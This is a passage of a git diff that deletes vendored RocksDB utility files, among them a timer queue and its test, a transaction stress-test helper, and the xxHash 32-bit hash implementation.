-          item.end = Clock::now() + std::chrono::milliseconds(new_period);
-          m_items.push(std::move(item));
-        }
-      }
-    }
-  }
-
-  bool m_finish = false;
-  bool m_cancel = false;
-  uint64_t m_idcounter = 0;
-  std::condition_variable m_checkWork;
-
-  struct WorkItem {
-    Clock::time_point end;
-    int64_t period;
-    uint64_t id;  // id==0 means it was cancelled
-    std::function<std::pair<bool, int64_t>(bool)> handler;
-    bool operator>(const WorkItem& other) const { return end > other.end; }
-  };
-
-  std::mutex m_mtx;
-  // Inheriting from priority_queue, so we can access the internal container
-  class Queue : public std::priority_queue<WorkItem, std::vector<WorkItem>,
-                                           std::greater<WorkItem>> {
-   public:
-    std::vector<WorkItem>& getContainer() { return this->c; }
-  } m_items;
-  rocksdb::port::Thread m_th;
-};
diff --git a/thirdparty/rocksdb/util/timer_queue_test.cc b/thirdparty/rocksdb/util/timer_queue_test.cc
deleted file mode 100644
index 5f5f08f..0000000
--- a/thirdparty/rocksdb/util/timer_queue_test.cc
+++ /dev/null
@@ -1,72 +0,0 @@
-//  Portions Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-// borrowed from
-// http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/
-// Timer Queue
-//
-// License
-//
-// The source code in this article is licensed under the CC0 license, so feel
-// free
-// to copy, modify, share, do whatever you want with it.
-// No attribution is required, but Ill be happy if you do.
-// CC0 license
-
-// The person who associated a work with this deed has dedicated the work to the
-// public domain by waiving all of his or her rights to the work worldwide
-// under copyright law, including all related and neighboring rights, to the
-// extent allowed by law.  You can copy, modify, distribute and perform the
-// work, even for
-// commercial purposes, all without asking permission. See Other Information
-// below.
-//
-
-#include "util/timer_queue.h"
-#include <future>
-
-namespace Timing {
-
-using Clock = std::chrono::high_resolution_clock;
-double now() {
-  static auto start = Clock::now();
-  return std::chrono::duration<double, std::milli>(Clock::now() - start)
-      .count();
-}
-
-}  // namespace Timing
-
-int main() {
-  TimerQueue q;
-
-  double tnow = Timing::now();
-
-  q.add(10000, [tnow](bool aborted) mutable {
-    printf("T 1: %d, Elapsed %4.2fms\n", aborted, Timing::now() - tnow);
-    return std::make_pair(false, 0);
-  });
-  q.add(10001, [tnow](bool aborted) mutable {
-    printf("T 2: %d, Elapsed %4.2fms\n", aborted, Timing::now() - tnow);
-    return std::make_pair(false, 0);
-  });
-
-  q.add(1000, [tnow](bool aborted) mutable {
-    printf("T 3: %d, Elapsed %4.2fms\n", aborted, Timing::now() - tnow);
-    return std::make_pair(!aborted, 1000);
-  });
-
-  auto id = q.add(2000, [tnow](bool aborted) mutable {
-    printf("T 4: %d, Elapsed %4.2fms\n", aborted, Timing::now() - tnow);
-    return std::make_pair(!aborted, 2000);
-  });
-
-  (void)id;
-  // auto ret = q.cancel(id);
-  // assert(ret == 1);
-  // q.cancelAll();
-
-  return 0;
-}
-//////////////////////////////////////////
diff --git a/thirdparty/rocksdb/util/transaction_test_util.cc b/thirdparty/rocksdb/util/transaction_test_util.cc
deleted file mode 100644
index 0d6948b..0000000
--- a/thirdparty/rocksdb/util/transaction_test_util.cc
+++ /dev/null
@@ -1,246 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "util/transaction_test_util.h"
-
-#include <inttypes.h>
-#include <string>
-#include <thread>
-
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "util/random.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-RandomTransactionInserter::RandomTransactionInserter(
-    Random64* rand, const WriteOptions& write_options,
-    const ReadOptions& read_options, uint64_t num_keys, uint16_t num_sets)
-    : rand_(rand),
-      write_options_(write_options),
-      read_options_(read_options),
-      num_keys_(num_keys),
-      num_sets_(num_sets),
-      txn_id_(0) {}
-
-RandomTransactionInserter::~RandomTransactionInserter() {
-  if (txn_ != nullptr) {
-    delete txn_;
-  }
-  if (optimistic_txn_ != nullptr) {
-    delete optimistic_txn_;
-  }
-}
-
-bool RandomTransactionInserter::TransactionDBInsert(
-    TransactionDB* db, const TransactionOptions& txn_options) {
-  txn_ = db->BeginTransaction(write_options_, txn_options, txn_);
-
-  return DoInsert(nullptr, txn_, false);
-}
-
-bool RandomTransactionInserter::OptimisticTransactionDBInsert(
-    OptimisticTransactionDB* db,
-    const OptimisticTransactionOptions& txn_options) {
-  optimistic_txn_ =
-      db->BeginTransaction(write_options_, txn_options, optimistic_txn_);
-
-  return DoInsert(nullptr, optimistic_txn_, true);
-}
-
-bool RandomTransactionInserter::DBInsert(DB* db) {
-  return DoInsert(db, nullptr, false);
-}
-
-bool RandomTransactionInserter::DoInsert(DB* db, Transaction* txn,
-                                         bool is_optimistic) {
-  Status s;
-  WriteBatch batch;
-  std::string value;
-
-  // pick a random number to use to increment a key in each set
-  uint64_t incr = (rand_->Next() % 100) + 1;
-
-  bool unexpected_error = false;
-
-  // For each set, pick a key at random and increment it
-  for (uint8_t i = 0; i < num_sets_; i++) {
-    uint64_t int_value = 0;
-    char prefix_buf[5];
-    // prefix_buf needs to be large enough to hold a uint16 in string form
-
-    // key format:  [SET#][random#]
-    std::string rand_key = ToString(rand_->Next() % num_keys_);
-    Slice base_key(rand_key);
-
-    // Pad prefix appropriately so we can iterate over each set
-    snprintf(prefix_buf, sizeof(prefix_buf), "%.4u", i + 1);
-    std::string full_key = std::string(prefix_buf) + base_key.ToString();
-    Slice key(full_key);
-
-    if (txn != nullptr) {
-      s = txn->GetForUpdate(read_options_, key, &value);
-    } else {
-      s = db->Get(read_options_, key, &value);
-    }
-
-    if (s.ok()) {
-      // Found key, parse its value
-      int_value = std::stoull(value);
-
-      if (int_value == 0 || int_value == ULONG_MAX) {
-        unexpected_error = true;
-        fprintf(stderr, "Get returned unexpected value: %s\n", value.c_str());
-        s = Status::Corruption();
-      }
-    } else if (s.IsNotFound()) {
-      // Have not yet written to this key, so assume its value is 0
-      int_value = 0;
-      s = Status::OK();
-    } else {
-      // Optimistic transactions should never return non-ok status here.
-      // Non-optimistic transactions may return write-coflict/timeout errors.
-      if (is_optimistic || !(s.IsBusy() || s.IsTimedOut() || s.IsTryAgain())) {
-        fprintf(stderr, "Get returned an unexpected error: %s\n",
-                s.ToString().c_str());
-        unexpected_error = true;
-      }
-      break;
-    }
-
-    if (s.ok()) {
-      // Increment key
-      std::string sum = ToString(int_value + incr);
-      if (txn != nullptr) {
-        s = txn->Put(key, sum);
-        if (!s.ok()) {
-          // Since we did a GetForUpdate, Put should not fail.
-          fprintf(stderr, "Put returned an unexpected error: %s\n",
-                  s.ToString().c_str());
-          unexpected_error = true;
-        }
-      } else {
-        batch.Put(key, sum);
-      }
-    }
-  }
-
-  if (s.ok()) {
-    if (txn != nullptr) {
-      std::hash<std::thread::id> hasher;
-      char name[64];
-      snprintf(name, 64, "txn%zu-%d", hasher(std::this_thread::get_id()),
-               txn_id_++);
-      assert(strlen(name) < 64 - 1);
-      txn->SetName(name);
-      s = txn->Prepare();
-      s = txn->Commit();
-
-      if (!s.ok()) {
-        if (is_optimistic) {
-          // Optimistic transactions can have write-conflict errors on commit.
-          // Any other error is unexpected.
-          if (!(s.IsBusy() || s.IsTimedOut() || s.IsTryAgain())) {
-            unexpected_error = true;
-          }
-        } else {
-          // Non-optimistic transactions should only fail due to expiration
-          // or write failures.  For testing purproses, we do not expect any
-          // write failures.
-          if (!s.IsExpired()) {
-            unexpected_error = true;
-          }
-        }
-
-        if (unexpected_error) {
-          fprintf(stderr, "Commit returned an unexpected error: %s\n",
-                  s.ToString().c_str());
-        }
-      }
-
-    } else {
-      s = db->Write(write_options_, &batch);
-      if (!s.ok()) {
-        unexpected_error = true;
-        fprintf(stderr, "Write returned an unexpected error: %s\n",
-                s.ToString().c_str());
-      }
-    }
-  } else {
-    if (txn != nullptr) {
-      txn->Rollback();
-    }
-  }
-
-  if (s.ok()) {
-    success_count_++;
-  } else {
-    failure_count_++;
-  }
-
-  last_status_ = s;
-
-  // return success if we didn't get any unexpected errors
-  return !unexpected_error;
-}
-
-Status RandomTransactionInserter::Verify(DB* db, uint16_t num_sets) {
-  uint64_t prev_total = 0;
-
-  // For each set of keys with the same prefix, sum all the values
-  for (uint32_t i = 0; i < num_sets; i++) {
-    char prefix_buf[6];
-    snprintf(prefix_buf, sizeof(prefix_buf), "%.4u", i + 1);
-    uint64_t total = 0;
-
-    Iterator* iter = db->NewIterator(ReadOptions());
-
-    for (iter->Seek(Slice(prefix_buf, 4)); iter->Valid(); iter->Next()) {
-      Slice key = iter->key();
-
-      // stop when we reach a different prefix
-      if (key.ToString().compare(0, 4, prefix_buf) != 0) {
-        break;
-      }
-
-      Slice value = iter->value();
-      uint64_t int_value = std::stoull(value.ToString());
-      if (int_value == 0 || int_value == ULONG_MAX) {
-        fprintf(stderr, "Iter returned unexpected value: %s\n",
-                value.ToString().c_str());
-        return Status::Corruption();
-      }
-
-      total += int_value;
-    }
-    delete iter;
-
-    if (i > 0) {
-      if (total != prev_total) {
-        fprintf(stderr,
-                "RandomTransactionVerify found inconsistent totals. "
-                "Set[%" PRIu32 "]: %" PRIu64 ", Set[%" PRIu32 "]: %" PRIu64
-                " \n",
-                i - 1, prev_total, i, total);
-        return Status::Corruption();
-      }
-    }
-    prev_total = total;
-  }
-
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/transaction_test_util.h b/thirdparty/rocksdb/util/transaction_test_util.h
deleted file mode 100644
index 8805490..0000000
--- a/thirdparty/rocksdb/util/transaction_test_util.h
+++ /dev/null
@@ -1,114 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/options.h"
-#include "port/port.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/transaction_db.h"
-
-namespace rocksdb {
-
-class DB;
-class Random64;
-
-// Utility class for stress testing transactions.  Can be used to write many
-// transactions in parallel and then validate that the data written is logically
-// consistent.  This class assumes the input DB is initially empty.
-//
-// Each call to TransactionDBInsert()/OptimisticTransactionDBInsert() will
-// increment the value of a key in #num_sets sets of keys.  Regardless of
-// whether the transaction succeeds, the total sum of values of keys in each
-// set is an invariant that should remain equal.
-//
-// After calling TransactionDBInsert()/OptimisticTransactionDBInsert() many
-// times, Verify() can be called to validate that the invariant holds.
-//
-// To test writing Transaction in parallel, multiple threads can create a
-// RandomTransactionInserter with similar arguments using the same DB.
-class RandomTransactionInserter {
- public:
-  // num_keys is the number of keys in each set.
-  // num_sets is the number of sets of keys.
-  explicit RandomTransactionInserter(
-      Random64* rand, const WriteOptions& write_options = WriteOptions(),
-      const ReadOptions& read_options = ReadOptions(), uint64_t num_keys = 1000,
-      uint16_t num_sets = 3);
-
-  ~RandomTransactionInserter();
-
-  // Increment a key in each set using a Transaction on a TransactionDB.
-  //
-  // Returns true if the transaction succeeded OR if any error encountered was
-  // expected (eg a write-conflict). Error status may be obtained by calling
-  // GetLastStatus();
-  bool TransactionDBInsert(
-      TransactionDB* db,
-      const TransactionOptions& txn_options = TransactionOptions());
-
-  // Increment a key in each set using a Transaction on an
-  // OptimisticTransactionDB
-  //
-  // Returns true if the transaction succeeded OR if any error encountered was
-  // expected (eg a write-conflict). Error status may be obtained by calling
-  // GetLastStatus();
-  bool OptimisticTransactionDBInsert(
-      OptimisticTransactionDB* db,
-      const OptimisticTransactionOptions& txn_options =
-          OptimisticTransactionOptions());
-  // Increment a key in each set without using a transaction.  If this function
-  // is called in parallel, then Verify() may fail.
-  //
-  // Returns true if the write succeeds.
-  // Error status may be obtained by calling GetLastStatus().
-  bool DBInsert(DB* db);
-
-  // Returns OK if Invariant is true.
-  static Status Verify(DB* db, uint16_t num_sets);
-
-  // Returns the status of the previous Insert operation
-  Status GetLastStatus() { return last_status_; }
-
-  // Returns the number of successfully written calls to
-  // TransactionDBInsert/OptimisticTransactionDBInsert/DBInsert
-  uint64_t GetSuccessCount() { return success_count_; }
-
-  // Returns the number of calls to
-  // TransactionDBInsert/OptimisticTransactionDBInsert/DBInsert that did not
-  // write any data.
-  uint64_t GetFailureCount() { return failure_count_; }
-
- private:
-  // Input options
-  Random64* rand_;
-  const WriteOptions write_options_;
-  const ReadOptions read_options_;
-  const uint64_t num_keys_;
-  const uint16_t num_sets_;
-
-  // Number of successful insert batches performed
-  uint64_t success_count_ = 0;
-
-  // Number of failed insert batches attempted
-  uint64_t failure_count_ = 0;
-
-  // Status returned by most recent insert operation
-  Status last_status_;
-
-  // optimization: re-use allocated transaction objects.
-  Transaction* txn_ = nullptr;
-  Transaction* optimistic_txn_ = nullptr;
-
-  std::atomic<int> txn_id_;
-
-  bool DoInsert(DB* db, Transaction* txn, bool is_optimistic);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/xxhash.cc b/thirdparty/rocksdb/util/xxhash.cc
deleted file mode 100644
index 4bce61a..0000000
--- a/thirdparty/rocksdb/util/xxhash.cc
+++ /dev/null
@@ -1,479 +0,0 @@
-/*
-xxHash - Fast Hash algorithm
-Copyright (C) 2012-2014, Yann Collet.
-BSD 2-Clause License (http://www.opensource.org/licenses/bsd-license.php)
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
-* Redistributions of source code must retain the above copyright
-notice, this list of conditions and the following disclaimer.
-* Redistributions in binary form must reproduce the above
-copyright notice, this list of conditions and the following disclaimer
-in the documentation and/or other materials provided with the
-distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-You can contact the author at :
-- xxHash source repository : http://code.google.com/p/xxhash/
-*/
-
-
-//**************************************
-// Tuning parameters
-//**************************************
-// Unaligned memory access is automatically enabled for "common" CPU, such as x86.
-// For others CPU, the compiler will be more cautious, and insert extra code to ensure aligned access is respected.
-// If you know your target CPU supports unaligned memory access, you want to force this option manually to improve performance.
-// You can also enable this parameter if you know your input data will always be aligned (boundaries of 4, for U32).
-#if defined(__ARM_FEATURE_UNALIGNED) || defined(__i386) || defined(_M_IX86) || defined(__x86_64__) || defined(_M_X64)
-#  define XXH_USE_UNALIGNED_ACCESS 1
-#endif
-
-// XXH_ACCEPT_NULL_INPUT_POINTER :
-// If the input pointer is a null pointer, xxHash default behavior is to trigger a memory access error, since it is a bad pointer.
-// When this option is enabled, xxHash output for null input pointers will be the same as a null-length input.
-// This option has a very small performance cost (only measurable on small inputs).
-// By default, this option is disabled. To enable it, uncomment below define :
-//#define XXH_ACCEPT_NULL_INPUT_POINTER 1
-
-// XXH_FORCE_NATIVE_FORMAT :
-// By default, xxHash library provides endian-independent Hash values, based on little-endian convention.
-// Results are therefore identical for little-endian and big-endian CPU.
-// This comes at a performance cost for big-endian CPU, since some swapping is required to emulate little-endian format.
-// Should endian-independence be of no importance for your application, you may set the #define below to 1.
-// It will improve speed for Big-endian CPU.
-// This option has no impact on Little_Endian CPU.
-#define XXH_FORCE_NATIVE_FORMAT 0
-
-
-//**************************************
-// Compiler Specific Options
-//**************************************
-// Disable some Visual warning messages
-#ifdef _MSC_VER  // Visual Studio
-#  pragma warning(disable : 4127)      // disable: C4127: conditional expression is constant
-#  pragma warning(disable : 4804)      // disable: C4804: 'operation' : unsafe use of type 'bool' in operation (static assert line 313)
-#endif
-
-#ifdef _MSC_VER    // Visual Studio
-#  define FORCE_INLINE static __forceinline
-#else
-#  ifdef __GNUC__
-#    define FORCE_INLINE static inline __attribute__((always_inline))
-#  else
-#    define FORCE_INLINE static inline
-#  endif
-#endif
-
-
-//**************************************
-// Includes & Memory related functions
-//**************************************
-#include "xxhash.h"
-// Modify the local functions below should you wish to use some other memory related routines
-// for malloc(), free()
-#include <stdlib.h>
-FORCE_INLINE void* XXH_malloc(size_t s) { return malloc(s); }
-FORCE_INLINE void  XXH_free  (void* p)  { free(p); }
-// for memcpy()
-#include <string.h>
-FORCE_INLINE void* XXH_memcpy(void* dest, const void* src, size_t size) { return memcpy(dest,src,size); }
-
-
-namespace rocksdb {
-//**************************************
-// Basic Types
-//**************************************
-#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L   // C99
-# include <stdint.h>
-  typedef uint8_t  BYTE;
-  typedef uint16_t U16;
-  typedef uint32_t U32;
-  typedef  int32_t S32;
-  typedef uint64_t U64;
-#else
-  typedef unsigned char      BYTE;
-  typedef unsigned short     U16;
-  typedef unsigned int       U32;
-  typedef   signed int       S32;
-  typedef unsigned long long U64;
-#endif
-
-#if defined(__GNUC__)  && !defined(XXH_USE_UNALIGNED_ACCESS)
-#  define _PACKED __attribute__ ((packed))
-#else
-#  define _PACKED
-#endif
-
-#if !defined(XXH_USE_UNALIGNED_ACCESS) && !defined(__GNUC__)
-#  ifdef __IBMC__
-#    pragma pack(1)
-#  else
-#    pragma pack(push, 1)
-#  endif
-#endif
-
-typedef struct _U32_S { U32 v; } _PACKED U32_S;
-
-#if !defined(XXH_USE_UNALIGNED_ACCESS) && !defined(__GNUC__)
-#  pragma pack(pop)
-#endif
-
-#define A32(x) (((U32_S *)(x))->v)
-
-
-//***************************************
-// Compiler-specific Functions and Macros
-//***************************************
-#define GCC_VERSION (__GNUC__ * 100 + __GNUC_MINOR__)
-
-// Note : although _rotl exists for minGW (GCC under windows), performance seems poor
-#if defined(_MSC_VER)
-#  define XXH_rotl32(x,r) _rotl(x,r)
-#else
-#  define XXH_rotl32(x,r) ((x << r) | (x >> (32 - r)))
-#endif
-
-#if defined(_MSC_VER)     // Visual Studio
-#  define XXH_swap32 _byteswap_ulong
-#elif GCC_VERSION >= 403
-#  define XXH_swap32 __builtin_bswap32
-#else
-static inline U32 XXH_swap32 (U32 x) {
-    return  ((x << 24) & 0xff000000 ) |
-        ((x <<  8) & 0x00ff0000 ) |
-        ((x >>  8) & 0x0000ff00 ) |
-        ((x >> 24) & 0x000000ff );}
-#endif
-
-
-//**************************************
-// Constants
-//**************************************
-#define PRIME32_1   2654435761U
-#define PRIME32_2   2246822519U
-#define PRIME32_3   3266489917U
-#define PRIME32_4    668265263U
-#define PRIME32_5    374761393U
-
-
-//**************************************
-// Architecture Macros
-//**************************************
-typedef enum { XXH_bigEndian=0, XXH_littleEndian=1 } XXH_endianess;
-#ifndef XXH_CPU_LITTLE_ENDIAN   // It is possible to define XXH_CPU_LITTLE_ENDIAN externally, for example using a compiler switch
-    static const int one = 1;
-#   define XXH_CPU_LITTLE_ENDIAN   (*(char*)(&one))
-#endif
-
-
-//**************************************
-// Macros
-//**************************************
-#define XXH_STATIC_ASSERT(c)   { enum { XXH_static_assert = 1/(!!(c)) }; }    // use only *after* variable declarations
-
-
-//****************************
-// Memory reads
-//****************************
-typedef enum { XXH_aligned, XXH_unaligned } XXH_alignment;
-
-FORCE_INLINE U32 XXH_readLE32_align(const U32* ptr, XXH_endianess endian, XXH_alignment align)
-{
-    if (align==XXH_unaligned)
-        return endian==XXH_littleEndian ? A32(ptr) : XXH_swap32(A32(ptr));
-    else
-        return endian==XXH_littleEndian ? *ptr : XXH_swap32(*ptr);
-}
-
-FORCE_INLINE U32 XXH_readLE32(const U32* ptr, XXH_endianess endian) { return XXH_readLE32_align(ptr, endian, XXH_unaligned); }
-
-
-//****************************
-// Simple Hash Functions
-//****************************
-FORCE_INLINE U32 XXH32_endian_align(const void* input, int len, U32 seed, XXH_endianess endian, XXH_alignment align)
-{
-    const BYTE* p = (const BYTE*)input;
-    const BYTE* const bEnd = p + len;
-    U32 h32;
-
-#ifdef XXH_ACCEPT_NULL_INPUT_POINTER
-    if (p==NULL) { len=0; p=(const BYTE*)(size_t)16; }
-#endif
-
-    if (len>=16)
-    {
-        const BYTE* const limit = bEnd - 16;
-        U32 v1 = seed + PRIME32_1 + PRIME32_2;
-        U32 v2 = seed + PRIME32_2;
-        U32 v3 = seed + 0;
-        U32 v4 = seed - PRIME32_1;
-
-        do
-        {
-            v1 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_2; v1 = XXH_rotl32(v1, 13); v1 *= PRIME32_1; p+=4;
-            v2 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_2; v2 = XXH_rotl32(v2, 13); v2 *= PRIME32_1; p+=4;
-            v3 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_2; v3 = XXH_rotl32(v3, 13); v3 *= PRIME32_1; p+=4;
-            v4 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_2; v4 = XXH_rotl32(v4, 13); v4 *= PRIME32_1; p+=4;
-        } while (p<=limit);
-
-        h32 = XXH_rotl32(v1, 1) + XXH_rotl32(v2, 7) + XXH_rotl32(v3, 12) + XXH_rotl32(v4, 18);
-    }
-    else
-    {
-        h32  = seed + PRIME32_5;
-    }
-
-    h32 += (U32) len;
-
-    while (p<=bEnd-4)
-    {
-        h32 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_3;
-        h32  = XXH_rotl32(h32, 17) * PRIME32_4 ;
-        p+=4;
-    }
-
-    while (p<bEnd)
-    {
-        h32 += (*p) * PRIME32_5;
-        h32 = XXH_rotl32(h32, 11) * PRIME32_1 ;
-        p++;
-    }
-
-    h32 ^= h32 >> 15;
-    h32 *= PRIME32_2;
-    h32 ^= h32 >> 13;
-    h32 *= PRIME32_3;
-    h32 ^= h32 >> 16;
-
-    return h32;
-}
-
-
-U32 XXH32(const void* input, int len, U32 seed)
-{
-#if 0
-    // Simple version, good for code maintenance, but unfortunately slow for small inputs
-    void* state = XXH32_init(seed);
-    XXH32_update(state, input, len);
-    return XXH32_digest(state);
-#else
-    XXH_endianess endian_detected = (XXH_endianess)XXH_CPU_LITTLE_ENDIAN;
-
-#  if !defined(XXH_USE_UNALIGNED_ACCESS)
-    if ((((size_t)input) & 3))   // Input is aligned, let's leverage the speed advantage
-    {
-        if ((endian_detected==XXH_littleEndian) || XXH_FORCE_NATIVE_FORMAT)
-            return XXH32_endian_align(input, len, seed, XXH_littleEndian, XXH_aligned);
-        else
-            return XXH32_endian_align(input, len, seed, XXH_bigEndian, XXH_aligned);
-    }
-#  endif
-
-    if ((endian_detected==XXH_littleEndian) || XXH_FORCE_NATIVE_FORMAT)
-        return XXH32_endian_align(input, len, seed, XXH_littleEndian, XXH_unaligned);
-    else
-        return XXH32_endian_align(input, len, seed, XXH_bigEndian, XXH_unaligned);
-#endif
-}
-
-
-//****************************
-// Advanced Hash Functions
-//****************************
-
-struct XXH_state32_t
-{
-    U64 total_len;
-    U32 seed;
-    U32 v1;
-    U32 v2;
-    U32 v3;
-    U32 v4;
-    int memsize;
-    char memory[16];
-};
-
-
-int XXH32_sizeofState()
-{
-    XXH_STATIC_ASSERT(XXH32_SIZEOFSTATE >= sizeof(struct XXH_state32_t));   // A compilation error here means XXH32_SIZEOFSTATE is not large enough
-    return sizeof(struct XXH_state32_t);
-}
-
-
-XXH_errorcode XXH32_resetState(void* state_in, U32 seed)
-{
-    struct XXH_state32_t * state = (struct XXH_state32_t *) state_in;
-    state->seed = seed;
-    state->v1 = seed + PRIME32_1 + PRIME32_2;
-    state->v2 = seed + PRIME32_2;
-    state->v3 = seed + 0;
-    state->v4 = seed - PRIME32_1;
-    state->total_len = 0;
-    state->memsize = 0;
-    return XXH_OK;
-}
-
-
-void* XXH32_init (U32 seed)
-{
-    void* state = XXH_malloc (sizeof(struct XXH_state32_t));
-    XXH32_resetState(state, seed);
-    return state;
-}
-
-
-FORCE_INLINE XXH_errorcode XXH32_update_endian (void* state_in, const void* input, int len, XXH_endianess endian)
-{
-    struct XXH_state32_t * state = (struct XXH_state32_t *) state_in;
-    const BYTE* p = (const BYTE*)input;
-    const BYTE* const bEnd = p + len;
-
-#ifdef XXH_ACCEPT_NULL_INPUT_POINTER
-    if (input==NULL) return XXH_ERROR;
-#endif
-
-    state->total_len += len;
-
-    if (state->memsize + len < 16)   // fill in tmp buffer
-    {
-        XXH_memcpy(state->memory + state->memsize, input, len);
-        state->memsize +=  len;
-        return XXH_OK;
-    }
-
-    if (state->memsize)   // some data left from previous update
-    {
-        XXH_memcpy(state->memory + state->memsize, input, 16-state->memsize);
-        {
-            const U32* p32 = (const U32*)state->memory;
-            state->v1 += XXH_readLE32(p32, endian) * PRIME32_2; state->v1 = XXH_rotl32(state->v1, 13); state->v1 *= PRIME32_1; p32++;
-            state->v2 += XXH_readLE32(p32, endian) * PRIME32_2; state->v2 = XXH_rotl32(state->v2, 13); state->v2 *= PRIME32_1; p32++;
-            state->v3 += XXH_readLE32(p32, endian) * PRIME32_2; state->v3 = XXH_rotl32(state->v3, 13); state->v3 *= PRIME32_1; p32++;
-            state->v4 += XXH_readLE32(p32, endian) * PRIME32_2; state->v4 = XXH_rotl32(state->v4, 13); state->v4 *= PRIME32_1; p32++;
-        }
-        p += 16-state->memsize;
-        state->memsize = 0;
-    }
-
-    if (p <= bEnd-16)
-    {
-        const BYTE* const limit = bEnd - 16;
-        U32 v1 = state->v1;
-        U32 v2 = state->v2;
-        U32 v3 = state->v3;
-        U32 v4 = state->v4;
-
-        do
-        {
-            v1 += XXH_readLE32((const U32*)p, endian) * PRIME32_2; v1 = XXH_rotl32(v1, 13); v1 *= PRIME32_1; p+=4;
-            v2 += XXH_readLE32((const U32*)p, endian) * PRIME32_2; v2 = XXH_rotl32(v2, 13); v2 *= PRIME32_1; p+=4;
-            v3 += XXH_readLE32((const U32*)p, endian) * PRIME32_2; v3 = XXH_rotl32(v3, 13); v3 *= PRIME32_1; p+=4;
-            v4 += XXH_readLE32((const U32*)p, endian) * PRIME32_2; v4 = XXH_rotl32(v4, 13); v4 *= PRIME32_1; p+=4;
-        } while (p<=limit);
-
-        state->v1 = v1;
-        state->v2 = v2;
-        state->v3 = v3;
-        state->v4 = v4;
-    }
-
-    if (p < bEnd)
-    {
-        XXH_memcpy(state->memory, p, bEnd-p);
-        state->memsize = (int)(bEnd-p);
-    }
-
-    return XXH_OK;
-}
-
-XXH_errorcode XXH32_update (void* state_in, const void* input, int len)
-{
-    XXH_endianess endian_detected = (XXH_endianess)XXH_CPU_LITTLE_ENDIAN;
-
-    if ((endian_detected==XXH_littleEndian) || XXH_FORCE_NATIVE_FORMAT)
-        return XXH32_update_endian(state_in, input, len, XXH_littleEndian);
-    else
-        return XXH32_update_endian(state_in, input, len, XXH_bigEndian);
-}
-
-
-
-FORCE_INLINE U32 XXH32_intermediateDigest_endian (void* state_in, XXH_endianess endian)
-{
-    struct XXH_state32_t * state = (struct XXH_state32_t *) state_in;
-    const BYTE * p = (const BYTE*)state->memory;
-    BYTE* bEnd = (BYTE*)state->memory + state->memsize;
-    U32 h32;
-
-    if (state->total_len >= 16)
-    {
-        h32 = XXH_rotl32(state->v1, 1) + XXH_rotl32(state->v2, 7) + XXH_rotl32(state->v3, 12) + XXH_rotl32(state->v4, 18);
-    }
-    else
-    {
-        h32  = state->seed + PRIME32_5;
-    }
-
-    h32 += (U32) state->total_len;
-
-    while (p<=bEnd-4)
-    {
-        h32 += XXH_readLE32((const U32*)p, endian) * PRIME32_3;
-        h32  = XXH_rotl32(h32, 17) * PRIME32_4;
-        p+=4;
-    }
-
-    while (p<bEnd)
-    {
-        h32 += (*p) * PRIME32_5;
-        h32 = XXH_rotl32(h32, 11) * PRIME32_1;
-        p++;
-    }
-
-    h32 ^= h32 >> 15;
-    h32 *= PRIME32_2;
-    h32 ^= h32 >> 13;
-    h32 *= PRIME32_3;
-    h32 ^= h32 >> 16;
-
-    return h32;
-}
-
-
-U32 XXH32_intermediateDigest (void* state_in)
-{
-    XXH_endianess endian_detected = (XXH_endianess)XXH_CPU_LITTLE_ENDIAN;
-
-    if ((endian_detected==XXH_littleEndian) || XXH_FORCE_NATIVE_FORMAT)
-        return XXH32_intermediateDigest_endian(state_in, XXH_littleEndian);
-    else
-        return XXH32_intermediateDigest_endian(state_in, XXH_bigEndian);
-}
-
-
-U32 XXH32_digest (void* state_in)
-{
-    U32 h32 = XXH32_intermediateDigest(state_in);
-
-    XXH_free(state_in);
-
-    return h32;
-}
-
-}  // namespace rocksdb
